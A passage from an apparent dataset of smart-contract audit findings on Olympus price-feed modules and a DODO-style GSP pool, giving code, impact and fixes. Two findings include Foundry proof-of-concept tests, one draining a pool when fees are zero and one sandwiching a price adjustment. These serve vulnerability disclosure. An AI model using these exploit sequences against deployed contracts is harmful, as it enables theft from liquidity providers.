and return values \\n (uint256 fee0, uint256 fee1) = lens_.getUncollectedFees(key_);\\n \\n //E calculates ratio of token1 in token0\\n return (reserve1 + fee1).mulDiv(10 ** token0Decimals, reserve0 + fee0);\\n }\\n\\n### UniswapV3OracleHelper.sol : \\n //E Returns the ratio of token1 to token0 in token1 decimals based on the TWAP\\n //E used in bophades/src/modules/PRICE/submodules/feeds/BunniPrice.sol, and SPPLY/submodules/BunniSupply.sol\\n function getTWAPRatio(\\n address pool_, \\n uint32 period_ //E period of the TWAP in seconds \\n ) public view returns (uint256) \\n {\\n //E return the time-weighted tick from period_ to now\\n int56 timeWeightedTick = getTimeWeightedTick(pool_, period_);\\n\\n IUniswapV3Pool pool = IUniswapV3Pool(pool_);\\n ERC20 token0 = ERC20(pool.token0());\\n ERC20 token1 = ERC20(pool.token1());\\n\\n // Quantity of token1 for 1 unit of token0 at the time-weighted tick\\n // Scale: token1 decimals\\n uint256 baseInQuote = OracleLibrary.getQuoteAtTick(\\n int24(timeWeightedTick),\\n uint128(10 ** token0.decimals()), // 1 unit of token0 => baseAmount\\n address(token0),\\n address(token1)\\n );\\n return baseInQuote;\\n }\\n```\\n" +Price can be miscalculated.,medium,"In `SimplePriceFeedStrategy.sol#getMedianPrice` function, when the length of `nonZeroPrices` is 2 and they are deviated it returns first non-zero value, not median value.\\n`SimplePriceFeedStrategy.sol#getMedianPriceIfDeviation` is as follows.\\n```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n237 uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are 
not enough non-zero prices to calculate a median, return the first non-zero price\\n246 if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n // Get the average and median and abort if there's a problem\\n // The following two values are guaranteed to not be 0 since sortedPrices only contains non-zero values and has a length of 3+\\n uint256 averagePrice = _getAveragePrice(sortedPrices);\\n253 uint256 medianPrice = _getMedianPrice(sortedPrices);\\n\\n if (params_.length != DEVIATION_PARAMS_LENGTH) revert SimpleStrategy_ParamsInvalid(params_);\\n uint256 deviationBps = abi.decode(params_, (uint256));\\n if (deviationBps <= DEVIATION_MIN || deviationBps >= DEVIATION_MAX)\\n revert SimpleStrategy_ParamsInvalid(params_);\\n\\n // Check the deviation of the minimum from the average\\n uint256 minPrice = sortedPrices[0];\\n262 if (((averagePrice - minPrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Check the deviation of the maximum from the average\\n uint256 maxPrice = sortedPrices[sortedPrices.length - 1];\\n266 if (((maxPrice - averagePrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Otherwise, return the first non-zero value\\n return firstNonZeroPrice;\\n }\\n```\\n\\nAs you can see above, on L237 it gets the list of non-zero prices. If the length of this list is smaller than 3, it assumes that a median price cannot be calculated and returns first non-zero price. This is wrong. If the number of non-zero prices is 2 and they are deviated, it has to return median value. 
The `_getMedianPrice` function called on L253 is as follows.\\n```\\n function _getMedianPrice(uint256[] memory prices_) internal pure returns (uint256) {\\n uint256 pricesLen = prices_.length;\\n\\n // If there are an even number of prices, return the average of the two middle prices\\n if (pricesLen % 2 == 0) {\\n uint256 middlePrice1 = prices_[pricesLen / 2 - 1];\\n uint256 middlePrice2 = prices_[pricesLen / 2];\\n return (middlePrice1 + middlePrice2) / 2;\\n }\\n\\n // Otherwise return the median price\\n // Don't need to subtract 1 from pricesLen to get midpoint index\\n // since integer division will round down\\n return prices_[pricesLen / 2];\\n }\\n```\\n\\nAs you can see, the median value can be calculated from two values. This problem exists at `getMedianPrice` function as well.\\n```\\n function getMedianPrice(uint256[] memory prices_, bytes memory) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n uint256 nonZeroPricesLen = nonZeroPrices.length;\\n // Can only calculate a median if there are 3+ non-zero prices\\n if (nonZeroPricesLen == 0) return 0;\\n if (nonZeroPricesLen < 3) return nonZeroPrices[0];\\n\\n // Sort the prices\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n return _getMedianPrice(sortedPrices);\\n }\\n```\\n","First, `SimplePriceFeedStrategy.sol#getMedianPriceIfDeviation` function has to be rewritten as follows.\\n```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted 
in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n- if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n+ if (nonZeroPrices.length < 2) return firstNonZeroPrice;\\n\\n // rest of code\\n }\\n```\\n\\nSecond, `SimplePriceFeedStrategy.sol#getMedianPrice` has to be modified as following.\\n```\\n function getMedianPrice(uint256[] memory prices_, bytes memory) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n uint256 nonZeroPricesLen = nonZeroPrices.length;\\n // Can only calculate a median if there are 3+ non-zero prices\\n if (nonZeroPricesLen == 0) return 0;\\n- if (nonZeroPricesLen < 3) return nonZeroPrices[0];\\n+ if (nonZeroPricesLen < 2) return nonZeroPrices[0];\\n\\n // Sort the prices\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n return _getMedianPrice(sortedPrices);\\n }\\n```\\n","When the length of `nonZeroPrices` is 2 and they are deviated, it returns first non-zero value, not median value. 
It causes wrong calculation error.","```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n237 uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n246 if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n // Get the average and median and abort if there's a problem\\n // The following two values are guaranteed to not be 0 since sortedPrices only contains non-zero values and has a length of 3+\\n uint256 averagePrice = _getAveragePrice(sortedPrices);\\n253 uint256 medianPrice = _getMedianPrice(sortedPrices);\\n\\n if (params_.length != DEVIATION_PARAMS_LENGTH) revert SimpleStrategy_ParamsInvalid(params_);\\n uint256 deviationBps = abi.decode(params_, (uint256));\\n if (deviationBps <= DEVIATION_MIN || deviationBps >= DEVIATION_MAX)\\n revert SimpleStrategy_ParamsInvalid(params_);\\n\\n // Check the deviation of the minimum from the average\\n uint256 minPrice = sortedPrices[0];\\n262 if (((averagePrice - minPrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Check the deviation of the maximum from the average\\n uint256 maxPrice = sortedPrices[sortedPrices.length - 1];\\n266 if (((maxPrice - averagePrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Otherwise, return the first non-zero value\\n return firstNonZeroPrice;\\n }\\n```\\n" +Price calculation can be manipulated by intentionally reverting some of price feeds.,medium,"Price calculation module 
iterates through available price feeds for the requested asset, gather prices of non-revert price feeds and then apply strategy on available prices to calculate final asset price. By abusing this functionality, an attacker can let some price feeds revert to get advantage from any manipulated price feed.\\nHere we have some methods that attackers can abuse to intentionally revert price feeds.\\nUniswapV3 price feed UniswapV3Price.sol#L210-214\\n```\\n// Get the current price of the lookup token in terms of the quote token\\n(, int24 currentTick, , , , , bool unlocked) = params.pool.slot0();\\n\\n// Check for re-entrancy\\nif (unlocked == false) revert UniswapV3_PoolReentrancy(address(params.pool));\\n```\\n\\nIn UniswapV3 price feed, it reverts if current state is re-entered. An attacker can intentionally revert this price feed by calling it from UniswapV3's callback methods.\\nBalancer price feed BalancerPoolTokenPrice.sol#L388 BalancerPoolTokenPrice.sol#487 BalancerPoolTokenPrice.sol#599 BalancerPoolTokenPrice.sol#748\\n```\\n// Prevent re-entrancy attacks\\nVaultReentrancyLib.ensureNotInVaultContext(balVault);\\n```\\n\\nIn BalancerPool price feed, it reverts if current state is re-entered. An attacker can intentionally revert this price feed by calling it in the middle of Balancer action.\\nBunniToken price feed BunniPirce.sol#L155-160\\n```\\n_validateReserves(\\n _getBunniKey(token),\\n lens,\\n params.twapMaxDeviationsBps,\\n params.twapObservationWindow\\n);\\n```\\n\\nIn BunniToken price feed, it validates reserves and reverts if it doesn't satisfy deviation. Since BunniToken uses UniswapV3, this can be intentionally reverted by calling it from UniswapV3's mint callback.\\n\\nUsually for ERC20 token prices, above 3 price feeds are commonly used combined with Chainlink price feed, and optionally with `averageMovingPrice`. There are another two points to consider here:\\nWhen average moving price is used, it is appended at the end of the price array. 
OlympusPrice.v2.sol#L160\\n```\\nif (asset.useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n```\\n\\nIn price calculation strategy, first non-zero price is used when there are 2 valid prices: `getMedianPriceIfDeviation` - SimplePriceFeedStrategy.sol#L246 `getMedianPrice` - SimplePriceFeedStrategy.sol#L313 For `getAveragePrice` and `getAveragePriceIfDeviation`, it uses average price if it deviates.\\n\\nBased on the information above, here are potential attack vectors that attackers would try:\\nWhen Chainlink price feed is manipulated, an attacker can disable all three above price feeds intentionally to get advantage of the price manipulation.\\nWhen Chainlink price feed is not used for an asset, an attacker can manipulate one of above 3 spot price feeds and disable other ones.\\nWhen `averageMovingPrice` is used and average price strategy is applied, the manipulation effect becomes half: $\\frac{(P + \\Delta X) + (P)}{2} = P + \\frac{\\Delta X}{2}, P=Market Price, \\Delta X=Manipulated Amount$","For the cases above that price feeds being intentionally reverted, the price calculation itself also should revert without just ignoring it.","Attackers can disable some of price feeds as they want with ease, they can get advantage of one manipulated price feed.","```\\n// Get the current price of the lookup token in terms of the quote token\\n(, int24 currentTick, , , , , bool unlocked) = params.pool.slot0();\\n\\n// Check for re-entrancy\\nif (unlocked == false) revert UniswapV3_PoolReentrancy(address(params.pool));\\n```\\n" +getReservesByCategory() when useSubmodules =true and submoduleReservesSelector=bytes4(0) will revert,medium,"in `getReservesByCategory()` Lack of check `data.submoduleReservesSelector!=""""` when call `submodule.staticcall(abi.encodeWithSelector(data.submoduleReservesSelector));` will revert\\nwhen `_addCategory()` if `useSubmodules==true`, `submoduleMetricSelector` must not empty and `submoduleReservesSelector` 
can empty (bytes4(0))\\nlike ""protocol-owned-treasury""\\n```\\n _addCategory(toCategory(""protocol-owned-treasury""), true, 0xb600c5e2, 0x00000000); // getProtocolOwnedTreasuryOhm()`\\n```\\n\\nbut when call `getReservesByCategory()` , don't check `submoduleReservesSelector!=bytes4(0)` and direct call `submoduleReservesSelector`\\n```\\n function getReservesByCategory(\\n Category category_\\n ) external view override returns (Reserves[] memory) {\\n// rest of code\\n // If category requires data from submodules, count all submodules and their sources.\\n len = (data.useSubmodules) ? submodules.length : 0;\\n\\n// rest of code\\n\\n for (uint256 i; i < len; ) {\\n address submodule = address(_getSubmoduleIfInstalled(submodules[i]));\\n (bool success, bytes memory returnData) = submodule.staticcall(\\n abi.encodeWithSelector(data.submoduleReservesSelector)\\n );\\n```\\n\\nthis way , when call like `getReservesByCategory(toCategory(""protocol-owned-treasury"")` will revert\\nPOC\\nadd to `SUPPLY.v1.t.sol`\\n```\\n function test_getReservesByCategory_includesSubmodules_treasury() public {\\n _setUpSubmodules();\\n\\n // Add OHM/gOHM in the treasury (which will not be included)\\n ohm.mint(address(treasuryAddress), 100e9);\\n gohm.mint(address(treasuryAddress), 1e18); // 1 gOHM\\n\\n // Categories already defined\\n\\n uint256 expectedBptDai = BPT_BALANCE.mulDiv(\\n BALANCER_POOL_DAI_BALANCE,\\n BALANCER_POOL_TOTAL_SUPPLY\\n );\\n uint256 expectedBptOhm = BPT_BALANCE.mulDiv(\\n BALANCER_POOL_OHM_BALANCE,\\n BALANCER_POOL_TOTAL_SUPPLY\\n );\\n\\n // Check reserves\\n SPPLYv1.Reserves[] memory reserves = moduleSupply.getReservesByCategory(\\n toCategory(""protocol-owned-treasury"")\\n );\\n }\\n```\\n\\n```\\n forge test -vv --match-test test_getReservesByCategory_includesSubmodules_treasury\\n\\nRunning 1 test for src/test/modules/SPPLY/SPPLY.v1.t.sol:SupplyTest\\n[FAIL. 
Reason: SPPLY_SubmoduleFailed(0xeb502B1d35e975321B21cCE0E8890d20a7Eb289d, 0x0000000000000000000000000000000000000000000000000000000000000000)] test_getReservesByCategory_includesSubmodules_treasury() (gas: 4774197\\n```\\n","```\\n function getReservesByCategory(\\n Category category_\\n ) external view override returns (Reserves[] memory) {\\n// rest of code\\n\\n\\n CategoryData memory data = categoryData[category_];\\n uint256 categorySubmodSources;\\n // If category requires data from submodules, count all submodules and their sources.\\n// Remove the line below\\n len = (data.useSubmodules) ? submodules.length : 0;\\n// Add the line below\\n len = (data.useSubmodules && data.submoduleReservesSelector!=bytes4(0)) ? submodules.length : 0;\\n```\\n",some category can't get `Reserves`,"```\\n _addCategory(toCategory(""protocol-owned-treasury""), true, 0xb600c5e2, 0x00000000); // getProtocolOwnedTreasuryOhm()`\\n```\\n" +Balancer LP valuation methodologies use the incorrect supply metric,medium,"In various Balancer LP valuations, totalSupply() is used to determine the total LP supply. However this is not the appropriate method for determining the supply. Instead getActualSupply should be used instead. Depending on the which pool implementation and how much LP is deployed, the valuation can be much too high or too low. Since the RBS pricing is dependent on this metric. 
It could lead to RBS being deployed at incorrect prices.\\nAuraBalancerSupply.sol#L345-L362\\n```\\nuint256 balTotalSupply = pool.balancerPool.totalSupply();\\nuint256[] memory balances = new uint256[](_vaultTokens.length);\\n// Calculate the proportion of the pool balances owned by the polManager\\nif (balTotalSupply != 0) {\\n // Calculate the amount of OHM in the pool owned by the polManager\\n // We have to iterate through the tokens array to find the index of OHM\\n uint256 tokenLen = _vaultTokens.length;\\n for (uint256 i; i < tokenLen; ) {\\n uint256 balance = _vaultBalances[i];\\n uint256 polBalance = (balance * balBalance) / balTotalSupply;\\n\\n\\n balances[i] = polBalance;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nTo value each LP token the contract divides the valuation of the pool by the total supply of LP. This in itself is correct, however the totalSupply method for a variety of Balancer pools doesn't accurately reflect the true LP supply. If we take a look at a few Balancer pools we can quickly see the issue:\\nThis pool shows a max supply of 2,596,148,429,273,858 whereas the actual supply is 6454.48. In this case the LP token would be significantly undervalued. If a sizable portion of the reserves are deployed in an affected pool the backing per OHM would appear to the RBS system to be much lower than it really is. 
As a result it can cause the RBS to deploy its funding incorrectly, potentially selling/buying at a large loss to the protocol.",Use a try-catch block to always query getActualSupply on each pool to make sure supported pools use the correct metric.,Pool LP can be grossly under/over valued,```\\nuint256 balTotalSupply = pool.balancerPool.totalSupply();\\nuint256[] memory balances = new uint256[](_vaultTokens.length);\\n// Calculate the proportion of the pool balances owned by the polManager\\nif (balTotalSupply != 0) {\\n // Calculate the amount of OHM in the pool owned by the polManager\\n // We have to iterate through the tokens array to find the index of OHM\\n uint256 tokenLen = _vaultTokens.length;\\n for (uint256 i; i < tokenLen; ) {\\n uint256 balance = _vaultBalances[i];\\n uint256 polBalance = (balance * balBalance) / balTotalSupply;\\n\\n\\n balances[i] = polBalance;\\n\\n\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n +Possible incorrect price for tokens in Balancer stable pool due to amplification parameter update,medium,"Incorrect price calculation of tokens in StablePools if amplification factor is being updated\\nThe amplification parameter used to calculate the invariant can be in a state of update. In such a case, the current amplification parameter can differ from the amplificaiton parameter at the time of the last invariant calculation. 
The current implementaiton of `getTokenPriceFromStablePool` doesn't consider this and always uses the amplification factor obtained by calling `getLastInvariant`\\n```\\n function getTokenPriceFromStablePool(\\n address lookupToken_,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n\\n // rest of code..\\n\\n try pool.getLastInvariant() returns (uint256, uint256 ampFactor) {\\n \\n // @audit the amplification factor as of the last invariant calculation is used\\n lookupTokensPerDestinationToken = StableMath._calcOutGivenIn(\\n ampFactor,\\n balances_,\\n destinationTokenIndex,\\n lookupTokenIndex,\\n 1e18,\\n StableMath._calculateInvariant(ampFactor, balances_) // Sometimes the fetched invariant value does not work, so calculate it\\n );\\n```\\n\\n```\\n // @audit the amplification parameter can be updated\\n function startAmplificationParameterUpdate(uint256 rawEndValue, uint256 endTime) external authenticate {\\n\\n // @audit for calculating the invariant the current amplification factor is obtained by calling _getAmplificationParameter()\\n function _onSwapGivenIn(\\n SwapRequest memory swapRequest,\\n uint256[] memory balances,\\n uint256 indexIn,\\n uint256 indexOut\\n ) internal virtual override whenNotPaused returns (uint256) {\\n (uint256 currentAmp, ) = _getAmplificationParameter();\\n uint256 amountOut = StableMath._calcOutGivenIn(currentAmp, balances, indexIn, indexOut, swapRequest.amount);\\n return amountOut;\\n }\\n```\\n",Use the latest amplification factor by callling the `getAmplificationParameter` function,"In case the amplification parameter of a pool is being updated by the admin, wrong price will be calculated.","```\\n function getTokenPriceFromStablePool(\\n address lookupToken_,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n\\n // rest of code..\\n\\n try pool.getLastInvariant() returns (uint256, uint256 ampFactor) {\\n \\n // @audit the amplification 
factor as of the last invariant calculation is used\\n lookupTokensPerDestinationToken = StableMath._calcOutGivenIn(\\n ampFactor,\\n balances_,\\n destinationTokenIndex,\\n lookupTokenIndex,\\n 1e18,\\n StableMath._calculateInvariant(ampFactor, balances_) // Sometimes the fetched invariant value does not work, so calculate it\\n );\\n```\\n" +Incorrect deviation calculation in isDeviatingWithBpsCheck function,medium,"The current implementation of the `isDeviatingWithBpsCheck` function in the codebase leads to inaccurate deviation calculations, potentially allowing deviations beyond the specified limits.\\nThe function `isDeviatingWithBpsCheck` checks if the deviation between two values exceeds a defined threshold. This function incorrectly calculates the deviation, considering only the deviation from the larger value to the smaller one, instead of the deviation from the mean (or TWAP).\\n```\\n function isDeviatingWithBpsCheck(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n if (deviationBps_ > deviationMax_)\\n revert Deviation_InvalidDeviationBps(deviationBps_, deviationMax_);\\n\\n return isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n\\n function isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return\\n (value0_ < value1_)\\n ? 
_isDeviating(value1_, value0_, deviationBps_, deviationMax_)\\n : _isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n```\\n\\nThe function then call `_isDeviating` to calculate how much the smaller value is deviated from the bigger value.\\n```\\n function _isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return ((value0_ - value1_) * deviationMax_) / value0_ > deviationBps_;\\n }\\n```\\n\\nThe function `isDeviatingWithBpsCheck` is usually used to check how much the current value is deviated from the TWAP value to make sure that the value is not manipulated. Such as spot price and twap price in UniswapV3.\\n```\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n baseInQuotePrice,\\n baseInQuoteTWAP,\\n params.maxDeviationBps,\\n DEVIATION_BASE\\n )\\n ) {\\n revert UniswapV3_PriceMismatch(address(params.pool), baseInQuoteTWAP, baseInQuotePrice);\\n }\\n```\\n\\nThe issue is isDeviatingWithBpsCheck is not check the deviation of current value to the TWAP but deviation from the bigger value to the smaller value. This leads to an incorrect allowance range for the price, permitting deviations that exceed the acceptable threshold.\\nExample:\\nTWAP price: 1000 Allow deviation: 10%.\\nThe correct deviation calculation will use deviation from the mean. 
The allow price will be from 900 to 1100 since:\\n|1100 - 1000| / 1000 = 10%\\n|900 - 1000| / 1000 = 10%\\nHowever the current calculation will allow the price from 900 to 1111\\n(1111 - 1000) / 1111 = 10%\\n(1000 - 900) / 1000 = 10%\\nEven though the actual deviation of 1111 to 1000 is |1111 - 1000| / 1000 = 11.11% > 10%","To accurately measure deviation, the isDeviating function should be revised to calculate the deviation based on the mean value: `| spot value - twap value | / twap value`.","This miscalculation allows for greater deviations than intended, increasing the vulnerability to price manipulation and inaccuracies in Oracle price reporting.","```\\n function isDeviatingWithBpsCheck(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n if (deviationBps_ > deviationMax_)\\n revert Deviation_InvalidDeviationBps(deviationBps_, deviationMax_);\\n\\n return isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n\\n function isDeviating(\\n uint256 value0_,\\n uint256 value1_,\\n uint256 deviationBps_,\\n uint256 deviationMax_\\n ) internal pure returns (bool) {\\n return\\n (value0_ < value1_)\\n ? _isDeviating(value1_, value0_, deviationBps_, deviationMax_)\\n : _isDeviating(value0_, value1_, deviationBps_, deviationMax_);\\n }\\n```\\n" +Pool can be drained if there are no LP_FEES,high,"The pool can be depleted because swaps allow the withdrawal of the entire balance, resulting in a reserve of 0 for a specific asset. When an asset's balance reaches 0, the PMMPricing algorithm incorrectly estimates the calculation of output amounts. Consequently, the entire pool can be exploited using a flash loan by depleting one of the tokens to 0 and then swapping back to the pool whatever is received.\\nFirstly, as indicated in the summary, selling quote/base tokens can lead to draining the opposite token in the pool, potentially resulting in a reserve of 0. 
Consequently, the swapping mechanism permits someone to entirely deplete the token balance within the pool. In such cases, the calculations within the pool mechanism become inaccurate. Therefore, swapping back to whatever has been initially purchased will result in acquiring more tokens, further exacerbating the depletion of the pool.\\nAllow me to provide a PoC to illustrate this scenario:\\n```\\nfunction test_poolCanBeDrained() public {\\n // @review 99959990000000000000000 this amount makes the reserve 0\\n // run a fuzz test, to get the logs easily I will just use this value as constant but I found it via fuzzing\\n // selling this amount to the pool will make the quote token reserves ""0"".\\n vm.startPrank(tapir);\\n uint256 _amount = 99959990000000000000000;\\n\\n // Buy shares with tapir, 10 - 10 initiate the pool\\n dai.transfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // make sure the values are correct with my math\\n assertTrue(gsp._BASE_RESERVE_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_RESERVE_() == 10 * 1e6);\\n assertTrue(gsp._BASE_TARGET_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_TARGET_() == 10 * 1e6);\\n assertEq(gsp.balanceOf(tapir), 10 * 1e18);\\n vm.stopPrank();\\n \\n // sell such a base token amount such that the quote reserve is 0\\n // I calculated the ""_amount"" already which will make the quote token reserve ""0""\\n vm.startPrank(hippo);\\n deal(DAI, hippo, _amount);\\n dai.transfer(address(gsp), _amount);\\n uint256 receivedQuoteAmount = gsp.sellBase(hippo);\\n\\n // print the reserves and the amount received by hippo when he sold the base tokens\\n console.log(""Received quote amount by hippo"", receivedQuoteAmount);\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n\\n // Quote reserve is 0!!! 
That means the pool has 0 assets, basically pool has only one asset now!\\n // this behaviour is almost always not a desired behaviour because we never want our assets to be 0 \\n // as a result of swapping or removing liquidity.\\n assertEq(gsp._QUOTE_RESERVE_(), 0);\\n\\n // sell the quote tokens received back to the pool immediately\\n usdc.transfer(address(gsp), receivedQuoteAmount);\\n\\n // cache whatever received base tokens from the selling back\\n uint256 receivedBaseAmount = gsp.sellQuote(hippo);\\n\\n console.log(""Received base amount by hippo"", receivedBaseAmount);\\n console.log(""Base target"", gsp._BASE_TARGET_());\\n console.log(""Quote target"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n \\n // whatever received in base tokens are bigger than our first flashloan! \\n // means that we have a profit!\\n assertGe(receivedBaseAmount, _amount);\\n console.log(""Profit for attack"", receivedBaseAmount - _amount);\\n }\\n```\\n\\nTest results and logs:",Do not allow the pools balance to be 0 or do not let LP_FEE to be 0 in anytime.,"Pool can be drained, funds are lost. Hence, high. Though, this can only happen when there are no ""LP_FEES"". However, when we check the default settings of the deployment, we see here that the LP_FEE is set to 0. 
So, it is ok to assume that the LP_FEES can be 0.","```\\nfunction test_poolCanBeDrained() public {\\n // @review 99959990000000000000000 this amount makes the reserve 0\\n // run a fuzz test, to get the logs easily I will just use this value as constant but I found it via fuzzing\\n // selling this amount to the pool will make the quote token reserves ""0"".\\n vm.startPrank(tapir);\\n uint256 _amount = 99959990000000000000000;\\n\\n // Buy shares with tapir, 10 - 10 initiate the pool\\n dai.transfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // make sure the values are correct with my math\\n assertTrue(gsp._BASE_RESERVE_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_RESERVE_() == 10 * 1e6);\\n assertTrue(gsp._BASE_TARGET_() == 10 * 1e18);\\n assertTrue(gsp._QUOTE_TARGET_() == 10 * 1e6);\\n assertEq(gsp.balanceOf(tapir), 10 * 1e18);\\n vm.stopPrank();\\n \\n // sell such a base token amount such that the quote reserve is 0\\n // I calculated the ""_amount"" already which will make the quote token reserve ""0""\\n vm.startPrank(hippo);\\n deal(DAI, hippo, _amount);\\n dai.transfer(address(gsp), _amount);\\n uint256 receivedQuoteAmount = gsp.sellBase(hippo);\\n\\n // print the reserves and the amount received by hippo when he sold the base tokens\\n console.log(""Received quote amount by hippo"", receivedQuoteAmount);\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n\\n // Quote reserve is 0!!! 
That means the pool has 0 assets, basically pool has only one asset now!\\n // this behaviour is almost always not a desired behaviour because we never want our assets to be 0 \\n // as a result of swapping or removing liquidity.\\n assertEq(gsp._QUOTE_RESERVE_(), 0);\\n\\n // sell the quote tokens received back to the pool immediately\\n usdc.transfer(address(gsp), receivedQuoteAmount);\\n\\n // cache whatever received base tokens from the selling back\\n uint256 receivedBaseAmount = gsp.sellQuote(hippo);\\n\\n console.log(""Received base amount by hippo"", receivedBaseAmount);\\n console.log(""Base target"", gsp._BASE_TARGET_());\\n console.log(""Quote target"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n \\n // whatever received in base tokens are bigger than our first flashloan! \\n // means that we have a profit!\\n assertGe(receivedBaseAmount, _amount);\\n console.log(""Profit for attack"", receivedBaseAmount - _amount);\\n }\\n```\\n" +"Adjusting ""_I_"" will create a sandwich opportunity because of price changes",medium,"Adjusting the value of ""I"" directly influences the price. This can be exploited by a MEV bot, simply by trading just before the ""adjustPrice"" function and exiting right after the price change. The profit gained from this operation essentially represents potential losses for the liquidity providers who supplied liquidity to the pool.\\nAs we can see in the docs, the ""I"" is the ""i"" value in here and it is directly related with the output amount a trader will receive when selling a quote/base token:\\nSince the price will change, the MEV bot can simply sandwich the tx. 
Here an example how it can be executed by a MEV bot:\\n```\\nfunction test_Adjusting_I_CanBeFrontrunned() external {\\n vm.startPrank(tapir);\\n\\n // Buy shares with tapir, 10 - 10\\n dai.safeTransfer(address(gsp), 10 * 1e18);\\n usdc.transfer(address(gsp), 10 * 1e6);\\n gsp.buyShares(tapir);\\n\\n // print some stuff\\n console.log(""Base target initial"", gsp._BASE_TARGET_());\\n console.log(""Quote target initial"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve initial"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve initial"", gsp._QUOTE_RESERVE_());\\n \\n // we know the price will decrease so lets sell the base token before that\\n uint256 initialBaseTokensSwapped = 5 * 1e18;\\n\\n // sell the base tokens before adjustPrice\\n dai.safeTransfer(address(gsp), initialBaseTokensSwapped);\\n uint256 receivedQuoteTokens = gsp.sellBase(tapir);\\n vm.stopPrank();\\n\\n // this is the tx will be sandwiched by the MEV trader\\n vm.prank(MAINTAINER);\\n gsp.adjustPrice(999000);\\n\\n // quickly resell whatever gained by the price update\\n vm.startPrank(tapir);\\n usdc.safeTransfer(address(gsp), receivedQuoteTokens);\\n uint256 receivedBaseTokens = gsp.sellQuote(tapir);\\n console.log(""Base target"", gsp._BASE_TARGET_());\\n console.log(""Quote target"", gsp._QUOTE_TARGET_());\\n console.log(""Base reserve"", gsp._BASE_RESERVE_());\\n console.log(""Quote reserve"", gsp._QUOTE_RESERVE_());\\n console.log(""Received base tokens"", receivedBaseTokens);\\n\\n // NOTE: the LP 